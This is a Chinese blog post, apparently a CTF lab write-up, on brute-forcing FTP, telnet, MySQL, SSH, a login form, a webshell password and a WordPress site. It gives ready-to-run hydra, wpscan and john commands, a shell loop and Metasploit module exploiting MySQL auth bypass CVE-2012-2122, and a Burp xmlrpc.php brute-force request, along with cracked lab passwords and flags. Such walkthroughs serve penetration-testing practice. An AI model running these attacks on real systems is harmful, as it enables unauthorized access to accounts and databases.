hydra暴力破解ftp-telnet-mysql-ssh-http

这篇具有很好参考价值的文章主要介绍了hydra暴力破解ftp-telnet-mysql-ssh-http。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

目录结构

简介:

一、FTP

1、FTP简介: FTP 是仅基于 TCP 的服务,不支持 UDP(防止丢包),与众不同的是FTP使用2个端口,一个数据端口和一个命令端口(也可叫做控制端口)。通常来说这两个端口是21(命令端口)和20(数据端口)

二、telnet

1、简介:测试连通性,也有用来管理路由交换设备的连通性,如H3C的路由器就可以实现telnet远程管理,只需要输入对应的用户名密码即可。Telnet服务器与Telnet客户端之间需要建立TCP连接,Telnet服务器的端口号为23。

三、MYSQL

1、简介:MySQL是一个关系型数据库管理系统,关联数据库将数据保存在不同的表中,而不是将所有数据放在一个大仓库内,这样就增加了速度并提高了灵活性。

四、登陆表单

1、简介:后台,指网站后台,有时也称为网站管理后台,是指用于管理网站前台的一系列操作,如:产品、企业信息的增加、更新、删除等。

 五、一句话密码破解

1、简介:一句话木马短小精悍,而且功能强大,隐蔽性非常好,在入侵中始终扮演着强大的作用

六、SSH离线破解

1、简介:SSH 为建立在应用层基础上的安全协议。SSH 是较可靠,专为远程登录会话和其他网络服务提供安全性的协议。利用 SSH 协议可以有效防止远程管理过程中的信息泄露问题

七、wordpress后台破解

1、简介:工具使用:WPScan是Kali Linux默认自带的一款漏洞扫描工具,它采用Ruby编写,能够扫描WordPress网站中的多种安全漏洞,其中包括WordPress本身的漏洞、插件漏洞和主题漏洞。


简介:

        暴力破解即账号枚举,攻击者使用自己的用户名和密码字典,对目的服务器进行一个一个尝试登陆,主要字典足够强大,肯定就会猜解成功。尝试爆破成功后,为攻击者下一步渗透做准备。

一、FTP

1、FTP简介: FTP 是仅基于 TCP 的服务,不支持 UDP(防止丢包),与众不同的是FTP使用2个端口,一个数据端口和一个命令端口(也可叫做控制端口)。通常来说这两个端口是21(命令端口)和20(数据端口)

  hydra一些命令说明

通用:hydra <参数> <IP地址> <服务名>

Options(参数选项):
-R 继续从上一次进度接着破解。
-S 采用SSL链接。
-s PORT 可通过这个参数指定非默认端口。
-l LOGIN 指定破解的用户,对特定用户破解。
-L FILE 指定用户名字典。
-p PASS 小写,指定密码破解,少用,一般是采用密码字典。
-P FILE 大写,指定密码字典。
-e ns 可选选项,n:空密码试探,s:使用指定用户和密码试探。
-C FILE 使用冒号分割格式,例如“登录名:密码”来代替-L/-P参数。
-M FILE 指定目标列表文件一行一条。
-o FILE 指定结果输出文件。
-f 在使用-M参数以后,找到第一对登录名或者密码的时候中止破解。
-t TASKS 同时运行的线程数,默认为16。
-w TIME 设置最大超时的时间,单位秒,默认是30s。
-v / -V 显示详细过程。
server 目标ip
service 指定服务名,支持的服务和协议:telnet ftp pop3[-ntlm] imap[-ntlm] smb smbnt http-{head|get} http-{get|post}-form http-proxy cisco cisco-enable vnc ldap2 ldap3 mssql mysql oracle-listener postgres nntp socks5 rexec rlogin pcnfs snmp rsh cvs svn icq sapr3 ssh smtp-auth[-ntlm] pcanywhere teamspeak sip vmauthd firebird ncp afp等等。

hydra -l admin -P /home/kali/top100pass.txt ftp://118.190.133.35

hydra暴力破解ftp-telnet-mysql-ssh-http

密码:zxcvbnm123

2、linux 登录 //还可以windows登录  软件登录  都可以...........

(1)ftp username:password@127.0.0.1:21 回车

(2)ftp username@127.0.0.1 回车   ##默认21端口 回车后输入密码

(3)ftp 127.0.0.1 回车   ##回车后 login 登录

(4)ftp 回车 --> open 127.0.0.1 --> login 登录

3、如果遇到中文乱码问题

set ftp:charset gbk(或者 gb2312 或 utf-8)   ##设置ftp端的编码格式

set file:charset utf-8 (...同上)        ##设置本地编码格式

4、使用ls命令 看到flag文件 然后下载

hydra暴力破解ftp-telnet-mysql-ssh-http

下载命令

lcd /home/kali                         ##存放目录 默认为 /home/kali

get 123.txt            ##下载123.txt文件到 /home/kali

hydra暴力破解ftp-telnet-mysql-ssh-http

5、得到flag 

 hydra暴力破解ftp-telnet-mysql-ssh-http

二、telnet

1、简介:测试连通性,也有用来管理路由交换设备的连通性,如H3C的路由器就可以实现telnet远程管理,只需要输入对应的用户名密码即可。Telnet服务器与Telnet客户端之间需要建立TCP连接,Telnet服务器的端口号为23。

hydra暴力破解ftp-telnet-mysql-ssh-http

2、kali打开hydra

hydra -l admin -P top100password.txt  telnet://www.whalwl.fun -s 2323

hydra暴力破解ftp-telnet-mysql-ssh-http

 3、登录

telnet www.whalwl.fun 2323

hydra暴力破解ftp-telnet-mysql-ssh-http

 4、查找flag 并查看

hydra暴力破解ftp-telnet-mysql-ssh-http

 hydra暴力破解ftp-telnet-mysql-ssh-http

 flag{95f5353104092bc55ad0aad7defb9295}

三、MYSQL

1、简介:MySQL是一个关系型数据库管理系统,关联数据库将数据保存在不同的表中,而不是将所有数据放在一个大仓库内,这样就增加了速度并提高了灵活性。

hydra暴力破解ftp-telnet-mysql-ssh-http

2、利用漏洞-Mysql 身份认证绕过漏洞(CVE-2012-2122


        当连接MariaDB/MySQL时,输入的密码会与期望的正确密码比较,由于不正确的处理,会导致即便是memcmp()返回一个非零值,也会使MySQL认为两个密码是相同的。 也就是说只要知道用户名,不断尝试就能够直接登入SQL数据库。按照公告说法大约256次就能够蒙对一次。

for i in `seq 1 1000`; do mysql -uroot -paaaaa -h 118.190.133.35 -P3308 ; done
for : 利用linux的shell创造一个for循环
i : 循环的变量
seq 1 1000:表示循环是从1-1000
do:执行
mysql -uroot -paaaaa:mysql的登录命令,意思是用户名是root,密码是aaaaa
-h 118.190.133.35 -P3308:-h是IP ;-P是端口
done:表示循环结束

3、验证并登录

for ((i=1;i<1000;i++));do mysql -h 118.190.133.35 -uroot -proot -P 3308;echo $i;done

hydra暴力破解ftp-telnet-mysql-ssh-http

 4、接下来看一下表 查看

show databases;

use whalwl;

show tables;

hydra暴力破解ftp-telnet-mysql-ssh-http

5、查看flag信息

select * from flag;

 hydra暴力破解ftp-telnet-mysql-ssh-http

 得到flag{d03d4082619be132cf07aa6e2724f854}

6、打开kali采用msfconsole中的模块进行漏洞验证,然后解hash就可以看到密码,得到密码后,可以利用数据库连接工具进行连接(这里我不做演示)

使用命令:
msfcnsole        #进入msf模块
use mysql_authbypass_hashdump   #使用漏洞工具模块
show options      #查看选项
set RHOSTS   118.190.133.35   #设置目标ip
set RPORT    3308             #设置目标端口
run                           #执行

四、登陆表单

1、简介:后台,指网站后台,有时也称为网站管理后台,是指用于管理网站前台的一系列操作,如:产品、企业信息的增加、更新、删除等。

hydra暴力破解ftp-telnet-mysql-ssh-http

1、先随便填写一个账号登录,发现弹窗显示用户不存在,

hydra暴力破解ftp-telnet-mysql-ssh-http

2、再使用admin账号,密码随便填写,发现弹窗显示账号或密码错误,所以我们可先进行用户名枚举,再根据用户名来爆破密码

hydra暴力破解ftp-telnet-mysql-ssh-http

3、使用burp suite抓包,指定爆破字典,即可先后爆破出用户名 和密码

hydra暴力破解ftp-telnet-mysql-ssh-http

4、admin账户 没爆出来

hydra暴力破解ftp-telnet-mysql-ssh-http

 5、使用另外一个用户名 zachariah

hydra暴力破解ftp-telnet-mysql-ssh-http

6、同时进行爆破

hydra暴力破解ftp-telnet-mysql-ssh-http

 hydra暴力破解ftp-telnet-mysql-ssh-http

 hydra暴力破解ftp-telnet-mysql-ssh-http

7、得到密码system2021 进行登录

hydra暴力破解ftp-telnet-mysql-ssh-http

 flag{7af9abf30e4cf730e76925bffd4340fc}

五、一句话密码破解

1、简介:一句话木马短小精悍,而且功能强大,隐蔽性非常好,在入侵中始终扮演着强大的作用

        这里一句话破解是破解网站shell密码,所以得到网址后,我们扫描一下目录,发现存在robots.txt文件,我们打开看一下,发现存在许多文件,我发现/.webconsole.php文件最可疑,我们就从这个开始破解shell密码。这里使用到的工具是K8_FuckOneShell(扫描shell密码) 然后我们下载靶场提供的字典,把字典粘贴到K8_FuckOneShell同文件目录下。下载地址GitHub - fan-ch/K8tools at 78dd750a11258b803c2a0f1a2dcdcbffc1834148 

WgpSec PAN

里面找一下 或者全部下载 反正以后也要用
2、扫描目录 7kbscan

hydra暴力破解ftp-telnet-mysql-ssh-http

2.1dirsearch目录扫描 //kali自带

dirsearch -u ip地址

hydra暴力破解ftp-telnet-mysql-ssh-http

 也能看到有这个文件

3、 得到wenshell地址

http://118.190.133.35:8089/robots.txt

hydra暴力破解ftp-telnet-mysql-ssh-http

4、K8_FuckOneShell

hydra暴力破解ftp-telnet-mysql-ssh-http

 vvvvvvvangel

5、菜刀连接-查找flag

hydra暴力破解ftp-telnet-mysql-ssh-http

 flag{dc6a19854e5a82ea97d486ccd98e39d0}

六、SSH离线破解

1、简介:SSH 为建立在应用层基础上的安全协议。SSH 是较可靠,专为远程登录会话和其他网络服务提供安全性的协议。利用 SSH 协议可以有效防止远程管理过程中的信息泄露问题

2、下载题目的字典文件john.zip发现有两个文件 shadow和john_dict.txt使用kali自带的john爆破工具进行撞库

2、工具介绍:john(线密码破解者)
          常用命令:john --wordlist=./dict.txt ./shadow -->指定字典dict.txt爆破shadow文件。
                          john ./shadow    -->不指定字典,直接拿john提供的字典来爆破shadow文件。
                john --show ./shadow -->查上次爆破结果,在shadow文件中。 
    3、john离线爆破,或hydra在线爆破(hydra -l test -P ./pass.txt ssh://118.190.133.35:22000),成功获取密码:zmmydfz@10086
    4、使用 FinalShell 或 XShell 连接SSH,认证方式选择Keyboard Interactive。
    5、命令行窗口执行①cd ../../②ls③cat this_is_flag得到flag信息:flag{1f73c112d66b314697d68115e06c409b}23888028fc0a:/$。
    6、注(21/11/04):Linux中直接使用ssh username@ip或ssh IP也可连接,如ssh root@127.0.0.1

hydra暴力破解ftp-telnet-mysql-ssh-http

zmmydfz@10086 

 3、ssh连接

hydra暴力破解ftp-telnet-mysql-ssh-http

 4、得到flag

hydra暴力破解ftp-telnet-mysql-ssh-http

 flag{1f73c112d66b314697d68115e06c409b}

七、wordpress后台破解

1、简介:工具使用:WPScan是Kali Linux默认自带的一款漏洞扫描工具,它采用Ruby编写,能够扫描WordPress网站中的多种安全漏洞,其中包括WordPress本身的漏洞、插件漏洞和主题漏洞。

常用命令:

wpscan --update           #更新到最新版本
wpscan --url  http://xxxx.com    #扫描网站
wpscan --url  http://xxxx.com  --enumerate -u   #枚举wordpress用户名
#--enumerate | -e [option(s)] 枚举
u 枚举用户名,默认从1-10
u[10-20] 枚举用户名,配置从10-20
p 枚举插件
vp 只枚举有漏洞的插件
ap 枚举所有插件,时间较长
tt 列举缩略图相关的文件
t 枚举主题信息
vt 只枚举存在漏洞的主题

2、对网站用户进行枚举爆破

wpscan --url http://118.190.133.35:8090/ --enumerate u

使用此命令,会枚举出网站已经注册的用户名,枚举出用户名之后,就可以通过xmlrpc.php或者后台登录页面进行爆破,对应的防御手段就是禁用掉xmlrpc.php并对后台进行隐藏
命令:wpscan –url (网站链接) –wordlist 密码文件 –username 用户名

wpscan --url http://118.190.133.35:8090 / -e u -P /home/kali/Desktop/dict.txt
wpscan  --url http://xxxx.com --username '用户名' -P 字典.txt #已知用户名使用字典爆破密码
wpscan  --url http://xxxx.com  -P password.txt -U username.txt  #同时爆破用户名及密码

wpscan --url http://118.190.133.35:8090 / -e u -P /home/kali/Desktop/dict.txt //程序会自动识别出用户名,并爆破密码

3、burp抓包 wpscan先枚举用户名 然后去登录 抓包进行密码破解就行了 都差不多文章来源地址https://www.toymoban.com/news/detail-409550.html

POST /xmlrpc.php HTTP/1.1
Host: 118.190.133.35:8090
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 240
Connection: close
Upgrade-Insecure-Requests: 1
<methodCall><methodName>blogger.getUsersBlogs</methodName><params><param><value><string></string></value></param><param><value><string>whalwlweb</string></value></param><param><value><string>§123456§</string></value></param></params></methodCall>

到了这里,关于hydra暴力破解ftp-telnet-mysql-ssh-http的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • Kali系统MSF模块暴力破解MySQL弱口令漏洞

    攻击环境使用KALI系统(使用虚拟机搭建)的Metasploit模块,msfconsole是metasploit中的一个工具,它集成了很多漏洞的利用的脚本,并且使用起来很简单的网络安全工具。 这里要特别强调:被攻击的环境必须开启mysql远程登陆服务,通常MySQL开启的端口号是3306,故而一般情况下要求

    2023年04月10日
    浏览(49)
  • 使用hydra进行HTTP认证破解

    hydra入门 hydra是什么 hydra的安装 hydra的基本使用 熟悉常见协议 HTTP协议 FTP协议 SSH协议 Telnet协议 熟悉hydra的参数 基本参数 高级参数 使用方法 使用hydra进行HTTP认证破解 HTTP基本认证 HTTP表单认证 HTTP COOKIES认证 使用hydra进行FTP认证破解 FTP基本认证 FTP匿名登录 使用hydra进行SSH认证

    2024年02月13日
    浏览(34)
  • 安全小课堂丨什么是暴力破解?如何防止暴力破解

    什么是暴力破解? 暴力破解也可称为穷举法、枚举法,是一种比较流行的密码破译方法,也就是将密码进行一一推算直到找出正确的密码为止。比如一个6位并且全部由数字组成的密码,可能有100万种组合,也就是说最多需要尝试100万次才能找到正确的密码,但也有可能尝试

    2024年04月28日
    浏览(36)
  • python暴力破解压缩包密码(python暴力破解zip压缩包)

    简介 : ZIP文件格式是一种数据压缩和文档储存的文件格式,原名Deflate,发明者为菲尔·卡茨(Phil Katz),他于1989年1月公布了该格式的资料。ZIP通常使用后缀名“.zip”,它的MIME格式为application/zip。当前,ZIP格式属于几种主流的压缩格式之一,其竞争者包括RAR格式以及开放源

    2024年02月03日
    浏览(46)
  • pikachu靶场之暴力破解

    目录 一、什么是暴力破解 二、burpsuite四种攻击类型   1. sniper(狙击手模式)  2. battering ram(攻城锤模式) 3. pitchfrk(音叉模式)   4. cluster bomb(集数炸弹模式)    三、pikachu暴力破解 1. 基于表单的暴力破解 2. 验证码绕过(on server)  3. 验证码绕过(on client) 4. on client和on server 5. token防

    2024年02月05日
    浏览(27)
  • 暴力破解漏洞

    暴力破解 一、简介 1、定义 暴力破解是一种针对密码的破译方法,将密码进行逐个推算直到找出真正的密码为止。 2、产生原因 由于服务器端没有做限制,导致攻击者可以通过暴力的手段破解所需信息。 3、注意事项 破解器一定要有一个有效的字典,判断用户是否设置了复杂

    2024年02月01日
    浏览(33)
  • 暴力破解——Web安全

    原理          所谓“暴力破解” : 就是用穷举法来算,也就是说从键盘上的字母和数字一个一个的试直到找到正确的密码。         在进行暴力破解时,我们经常采用 字典 进行破解。字典就是攻击者把自己认为的正确密码,以及碰到的密码提前写入到文档里去。在进

    2024年02月09日
    浏览(38)
  • 暴力破解及验证码安全

    1、破解前一定要有一个有郊的字典(Top100 TOP2000 csdn QQ 163等密码)         https://www.bugku.com/mima/    密码生成器  2、判断用户是否设置了复杂的密码         在注册页面注册一个,用简单密码看是否可以注册成功  3、网站是否存在验证码         注意隐藏验证码  4、尝

    2024年02月03日
    浏览(50)
  • DVWA——暴力破解

    1.首先打开dvwa,usename为admin,随便写一个密码123456,先不要点login。  2.然后打开bp,进行抓包拦截。  3.然后回到dvwa,点击login。 4.回到bp,将其发至inturder和repeater,然后点击intruder。 5.查看一下对不对。  6.选择sniper狙击,然后点击clear$,清除bp自己选择的爆破位置,选择pas

    2024年02月07日
    浏览(39)
  • CTF暴力破解

    题目附件解压要密码那种......密码是啥? 嗯~题目叫暴力破解,咱就听话,直接zip爆破试试。

    2024年02月11日
    浏览(23)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包